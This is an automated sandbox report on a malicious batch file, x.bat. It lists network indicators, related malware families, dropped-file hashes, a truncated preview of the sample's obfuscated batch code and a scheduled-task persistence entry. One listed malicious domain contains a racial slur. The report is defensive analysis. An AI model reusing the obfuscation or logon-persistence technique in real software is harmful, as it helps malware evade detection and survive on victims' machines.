Name | Source | Malicious | Antivirus Detection | Reputation
https://word.office.com | svchost.exe, 00000031.00000000.2219839835.0000020D264CE000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702 | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://powerpoint.office.com% | svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/09/policy | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/erties | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq | Microsoft-Windows-PushNotification-Platform%4Operational.evtx.26.dr | false | | high
https://aka.ms/pscore6 | powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp; Null.5.dr; Null.28.dr | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://powerpoint.office.com | svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.micro | svchost.exe, 0000001D.00000002.2312973165.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001C.00000002.2348049601.00000253A6312000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6xG_ | powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy | lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://excel.office.comSRD1% | svchost.exe, 00000031.00000002.2367360741.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2309382553.0000020D25613000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000000.2214085696.0000020D26029000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000000.2210065535.0000020D25613000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/soap12/ | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://powerpoint.office.comSRD13 | svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2384491857.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000000.2221218953.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.comSRD1- | svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.comSRD1# | svchost.exe, 00000031.00000002.2377995052.0000020D26484000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2383762701.0000020D26586000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000000.2210283099.0000020D25681000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000031.00000002.2316304169.0000020D25681000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/ws-sx/ws-trust/200512 | lsass.exe, 0000000A.00000000.1990365949.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000002.2296144477.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd | lsass.exe, 0000000A.00000002.2294720513.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp; lsass.exe, 0000000A.00000000.1990349580.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000001C.00000002.2348049601.00000253A6041000.00000004.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
103.230.121.81 | iam.nigga.dad | Hong Kong | 62468 | VPSQUANUS | true
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1574678
                                            Start date and time:2024-12-13 13:38:46 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 10m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:22
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:30
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Critical Process Termination
                                            Sample name:x.bat
                                            Detection:MAL
                                            Classification:mal100.spyw.evad.winBAT@34/71@1/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 60
                                            • Number of non-executed functions: 333
                                            Cookbook Comments:
                                            • Found application associated with file extension: .bat
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe
                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 20.190.147.5, 20.42.73.29
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: x.bat
Time | Type | Description
07:39:58 | API Interceptor | 2x Sleep call for process: WMIC.exe modified
07:40:01 | API Interceptor | 87x Sleep call for process: powershell.exe modified
Match: 103.230.121.81 (IP)
Associated Sample Name / URL | Detection | Threat Name | Context
product.bat | malicious | Unknown |
test.exe | malicious | Unknown |
Filezilla-stage2.exe | malicious | Unknown |

Match: iam.nigga.dad (domain)
Associated Sample Name / URL | Detection | Threat Name | Context
product.bat | malicious | Unknown | 103.230.121.81
test.exe | malicious | Unknown | 103.230.121.81
Filezilla-stage2.exe | malicious | Unknown | 103.230.121.81

Match: VPSQUANUS (ASN)
Associated Sample Name / URL | Detection | Threat Name | Context
product.bat | malicious | Unknown | 103.230.121.81
test.exe | malicious | Unknown | 103.230.121.81
Filezilla-stage2.exe | malicious | Unknown | 103.230.121.81
rebirth.dbg.elf | malicious | Mirai, Okiru | 103.252.20.25
mips.nn.elf | malicious | Mirai, Okiru | 103.122.177.128
la.bot.arm.elf | malicious | Mirai | 154.91.52.33
file.exe | malicious | XWorm | 103.230.121.124
file.exe | malicious | XWorm | 103.230.121.124
word.exe | malicious | XWorm | 103.230.121.124
svchost.exe | malicious | XWorm | 103.230.121.124

No context

Match: C:\Windows\$nya-onimai2\IfMUlU.exe (dropped file)
Associated Sample Name / URL | Detection | Threat Name | Context
product.bat | malicious | Unknown |
Hydra.ccLoader.bat | malicious | Unknown |
NhoqAfkhHL.bat | malicious | Unknown |
                                                        Process:C:\Windows\System32\lsass.exe
                                                        File Type:very short file (no magic)
                                                        Category:modified
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3::
                                                        MD5:93B885ADFE0DA089CDF634904FD59F71
                                                        SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                        SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                        SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                        Malicious:false
                                                        Preview:.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:modified
                                                        Size (bytes):9713
                                                        Entropy (8bit):4.940954773740904
                                                        Encrypted:false
                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                                                        MD5:BA7C69EBE30EC7DA697D2772E36A746D
                                                        SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                                                        SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                                                        SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                                                        Malicious:false
                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2892
                                                        Entropy (8bit):5.437969087793142
                                                        Encrypted:false
                                                        SSDEEP:48:oizsSU4y4RQmFoUL5a+m9qr9t5/78NWR8lgxJZKaVEouYAgwd64rHLjtvk:oizlHyIFKEg9qrh7KWBJ5Eo9Adrxk
                                                        MD5:F187E059B6AB94D3F218253CA180C199
                                                        SHA1:20203FAC2034CC4A6F3E0119DC02B9CACEF2973C
                                                        SHA-256:238A0A4F0560A22C11544F0312F7EB787D4B5C60994C6B0904487045CB410AA0
                                                        SHA-512:5BFC8D7159ADC154ECDBC2B8EC716277FEA72E1573C362BF84208AC36056E1FC864636C882C3C272AF9C5F9F7B1E1E56D1DB671A7B01A490040E652850331B0F
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (3511), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):7312129
                                                        Entropy (8bit):6.017050343783169
                                                        Encrypted:false
                                                        SSDEEP:49152:wDYqqQ9PgglFCYjq3HsyU+CwUp7B+Li23ovqJ+dwvnP/SRqRIEIS1x3KMb/ASHc0:h
                                                        MD5:3839596A3F33711ABCE263E7D890B2E9
                                                        SHA1:185A35A99A20422843725342C374EBAE76B76FDC
                                                        SHA-256:AC0C9AD2975E52B69068D331E25C0F7E1AAA2976651794B1EEADF5A3529BCAF0
                                                        SHA-512:D00D7BB5F7CDBEA678B03A312DF249F2F7550462A7E81151E7DB960C8F05D61D91B4BA03F89BF107D8419540897B056408FD21A68B408F122AA9906A9A1F348A
                                                        Malicious:false
                                                        Preview:@echo off..%RKvQjzEhGUtCzoCqSvuaYKSBifusrwnQWHuUlxqUJiLDfoFwJELgAXS%@%RUIeelQjHDGRTIeuf%%rQZpvTzYIMLgqYPncrPlPyrBWCIOCbzqbZGbh%e%yOFfDdyAmHcGFNFTLTyysTlLwGnufqsNfzSaGJUo%%wpaMVvMLhoND%c%kEDUJWQeuVpoBfUEmcYkvVDkYAlAJXcEkvpnwMZYxXbuKxu%%RgUmPsnobsViLpvxSKdfQHiAca%h%yUjzBgVJCcQPRiameRRnhCEBaupzkYukOGPuRTtcPGSucUlXPu%%IkNEWpIzhQwzEI%o%alsGvlxPxBJkyfisJPUMZbbTejtmlthoMwTZEjZSkvp%%mfjtYyMJKVGZk% %BmRlEduvybliNAQbBEMYGZZZnNGxEQQUPfHM%%ZRmJRHhiQKm%o%ItbnmSCmRXRwWRHlqtISdZCNzoPrRRxcuFVwOHDneAkbZPNaaWRxctPIR%%NXclvZAOcqVkwIQvODPANKBPr%f%aaaaPmFAUFkTekBlMwePziHGFlTqAcwnTAZzNbBJFWOklVyFZCYfKCvRttv%%spZSjWZEkbxKVukDuwvJNnqYeqCreiguFWqpXVboW%f%vXenjqsSxWYMRfYaNStHzbUdfYdUGyuhNTSsURgmZmLkwTflrWhiUoutdb%..%lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkc
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36864
                                                        Entropy (8bit):4.3900594222407125
                                                        Encrypted:false
                                                        SSDEEP:384:VZCSSrPcfu1FIyBl3pdSRf+yTq5+9f2sMbRAxzQ1yTkepoeL80bk20OzSIS+gL0i:VZArPDDIulZdSRWfY9f/hngDU2/t7
                                                        MD5:B943A57BDF1BBD9C33AB0D33FF885983
                                                        SHA1:1CEE65EEA1AB27EAE9108C081E18A50678BD5CDC
                                                        SHA-256:878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
                                                        SHA-512:CB7253DE88BD351F8BCB5DC0B5760D3D2875D39F601396A4250E06EAD9E7EDEFFCD94FA23F392833F450C983A246952F2BAD3A40F84AFF2ADC0F7D0EB408D03C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        Joe Sandbox View:
                                                        • Filename: product.bat, Detection: malicious, Browse
                                                        • Filename: Hydra.ccLoader.bat, Detection: malicious, Browse
                                                        • Filename: NhoqAfkhHL.bat, Detection: malicious, Browse
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:DOS batch file, ASCII text, with very long lines (3511), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):7312129
                                                        Entropy (8bit):6.017050343783169
                                                        Encrypted:false
                                                        SSDEEP:49152:wDYqqQ9PgglFCYjq3HsyU+CwUp7B+Li23ovqJ+dwvnP/SRqRIEIS1x3KMb/ASHc0:h
                                                        MD5:3839596A3F33711ABCE263E7D890B2E9
                                                        SHA1:185A35A99A20422843725342C374EBAE76B76FDC
                                                        SHA-256:AC0C9AD2975E52B69068D331E25C0F7E1AAA2976651794B1EEADF5A3529BCAF0
                                                        SHA-512:D00D7BB5F7CDBEA678B03A312DF249F2F7550462A7E81151E7DB960C8F05D61D91B4BA03F89BF107D8419540897B056408FD21A68B408F122AA9906A9A1F348A
                                                        Malicious:true
                                                        Preview:@echo off..%RKvQjzEhGUtCzoCqSvuaYKSBifusrwnQWHuUlxqUJiLDfoFwJELgAXS%@%RUIeelQjHDGRTIeuf%%rQZpvTzYIMLgqYPncrPlPyrBWCIOCbzqbZGbh%e%yOFfDdyAmHcGFNFTLTyysTlLwGnufqsNfzSaGJUo%%wpaMVvMLhoND%c%kEDUJWQeuVpoBfUEmcYkvVDkYAlAJXcEkvpnwMZYxXbuKxu%%RgUmPsnobsViLpvxSKdfQHiAca%h%yUjzBgVJCcQPRiameRRnhCEBaupzkYukOGPuRTtcPGSucUlXPu%%IkNEWpIzhQwzEI%o%alsGvlxPxBJkyfisJPUMZbbTejtmlthoMwTZEjZSkvp%%mfjtYyMJKVGZk% %BmRlEduvybliNAQbBEMYGZZZnNGxEQQUPfHM%%ZRmJRHhiQKm%o%ItbnmSCmRXRwWRHlqtISdZCNzoPrRRxcuFVwOHDneAkbZPNaaWRxctPIR%%NXclvZAOcqVkwIQvODPANKBPr%f%aaaaPmFAUFkTekBlMwePziHGFlTqAcwnTAZzNbBJFWOklVyFZCYfKCvRttv%%spZSjWZEkbxKVukDuwvJNnqYeqCreiguFWqpXVboW%f%vXenjqsSxWYMRfYaNStHzbUdfYdUGyuhNTSsURgmZmLkwTflrWhiUoutdb%..%lmylYBQYXmFgWLhImq%s%HlSRCKqmmyyypSJVZBbNIFUhYLPlxNFhdstWsuVBHpEAzNqn%%QihlDbcqLSRUfOzSrvWzMCE%e%zfsbuIlvBYHFyVzrrGHBdHCAeHhstOAnDBMyIbVcHwth%%UuwVFhgVcCSCRWNBT%t%MxtbXibIqKF%%HovtkmLwOHtsBYUVQeiBOuGJNTwnTXRwqiVDhyMAQwnfdbAYogRlBefmIL%l%rPyCQQXcsdqNssHLsgAFLsyYNgFUmcIVvSuLrUwpgZh%%XsyTUsNghfUYrzOKkc
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):3494
                                                        Entropy (8bit):3.5825816983996557
                                                        Encrypted:false
                                                        SSDEEP:96:tp2Znkp2Gdi3ipVA9ll7EhAMz3cHtgjy++:CJkYx39OhO6jy++
                                                        MD5:4E4ACA4A800CFAE1555EBA88D1065300
                                                        SHA1:AE909A9F2A9AC72C58F5781B0BF59EE64CA2F91C
                                                        SHA-256:3AF42BCE705FC7EB32B9BDC5471DFAD9E82EE5B4643B9237C663EC82FE901AD2
                                                        SHA-512:3E3CE090AC3ECB51F6FB53DEAE0CA91EE9D1F7A4F482CC31D6DF1C3D054E6B42C8C9A642A56A2A8CA369DC57E05F54B9194D21BF7D4ADE9908D711F2D6C12972
                                                        Malicious:false
Preview (UTF-16 decoded):<?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <RegistrationInfo> <Date>2024-12-13T07:45:41.949-05:00</Date> <URI>\$nya-SgIauazY</URI> </RegistrationInfo> <Triggers> <LogonTrigger> <Enabled>true</Enabled> </LogonTrigger> </Triggers> <Principals> <Principal id="Author"> <RunLevel>HighestAvailable</RunLevel> <GroupId>builtin\Users</GroupId> </Principal>
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):3376
                                                        Entropy (8bit):3.929829131899758
                                                        Encrypted:false
                                                        SSDEEP:48:Ms5/nrP+sXCrPwfFRVEfWb3/OoNMiyTL3W5HSqdrSDFDSL3:D/9Crup/vOo+xLG1joFe3
                                                        MD5:E17C2C0005DEDC7E29ED73894D40681F
                                                        SHA1:A3CF98208B105CB56CCD46DCE8AED98D948CE5DB
                                                        SHA-256:1E7F7062650CD365E5FBB1E94AA8CBEE61E9046A119A436C3E7DB3FB63BAF52F
                                                        SHA-512:18F2DD9BA7E71141BCE73F450F32024854A0E31790835469B035BFE87FF8ACF3DA2025C5C8CBFC217B976CF4604BBB9AD5C1D6D0AAF090F9AD3F5FCE558DC75F
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):3.1666402962089175
                                                        Encrypted:false
                                                        SSDEEP:384:ahe6UHi2uepX7xasnPC3FzFtpFDhFPFyF842Al:aVUHiapX7xadptrDT9W84D
                                                        MD5:A74CE5C6257805D2551C46277CE2263B
                                                        SHA1:234D67DD4FB9DD141141C4B8BEC7F8EE019E72DC
                                                        SHA-256:1F3C37BAF8BD01FA479E4CB6DA3A6819D613A0D4703466980823C5B15F410C1A
                                                        SHA-512:38E4A74E8395EC245409A76B138639AC20CB6A199921A2982F0D7AED44389CBD3A0EC1AB4521286708A7A01126CE382EF7124860D7150B0C1E6C6E5F3FD01C66
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):2.010692427789071
                                                        Encrypted:false
                                                        SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                        MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                        SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                        SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                        SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):66960
                                                        Entropy (8bit):4.165713242110943
                                                        Encrypted:false
                                                        SSDEEP:384:gVdVghfVaVtVbVHVyV5V+VSVBVNVEVrVBVeVPVpVCVigVgVpVeVNVkVUVAVJVgVm:Vhfhd0UNt
                                                        MD5:5D3889F991D37BD701DD4E4C146880CB
                                                        SHA1:E601669B1DECC111185B0B8D71C28E73A64CA18C
                                                        SHA-256:B3B043AC976889C5A62D5290265D90F1AC519BCCB2A01B0A931EF91018A80076
                                                        SHA-512:27806AE63B4C18265AFD1EA0D88DC26CA37082037D4AC6788CB88B26831E093797F8A5954098E3746214F6859796D90C91CFE90FD03002243D7A4CCF0802483E
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.4281985572602
                                                        Encrypted:false
                                                        SSDEEP:384:QhTm5mc5mNQ9momTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:QdfD6CL49mVpgwQFQ
                                                        MD5:4D2A74DDCE0E933295361813745332B4
                                                        SHA1:CC9B6665552A463E15B9DC86DA8C6BCF4A402BDE
                                                        SHA-256:A10063A089800F4FA943F4F37A02CBB1A9F0C9B792D846FEDCEF5ECC722A7746
                                                        SHA-512:F905C36D00B5713C4528164832A52FD8BA9AE04116F845EC3251573D76553A985D991FA93CCCDC33B55AFDC8A9238D0B1AAD78FBC6BB9B520DC434499C9BFDB2
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.35238183906338816
                                                        Encrypted:false
                                                        SSDEEP:48:MPsWNWwrP+AQNRBEZWTENO4bnB+zMgq+ckH58ykH5bOTLHyRdHLP7jMLckH58yk8:DNVaO8sMa3Z85ZML4rjjO3Z85Zu
                                                        MD5:A1AA11A4FDFB5E94FC4CB849323ACBD5
                                                        SHA1:FFABB9CDF5F5FAE6AEF2A046924A7580631BD67F
                                                        SHA-256:081C893D4E499275097C5661595010C1D7D74628E486A4F5277699EAEF31ACFF
                                                        SHA-512:76B8A3DE8CB26A613D16C47F65378DA8E7D9A4D9189C520E428FD8265B053854AC50A51EE4EDF910E025CF87A987CBE6E2B3B1995CB611F2CE7B7B0B0D43533E
                                                        Malicious:false
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):4.014860518194814
                                                        Encrypted:false
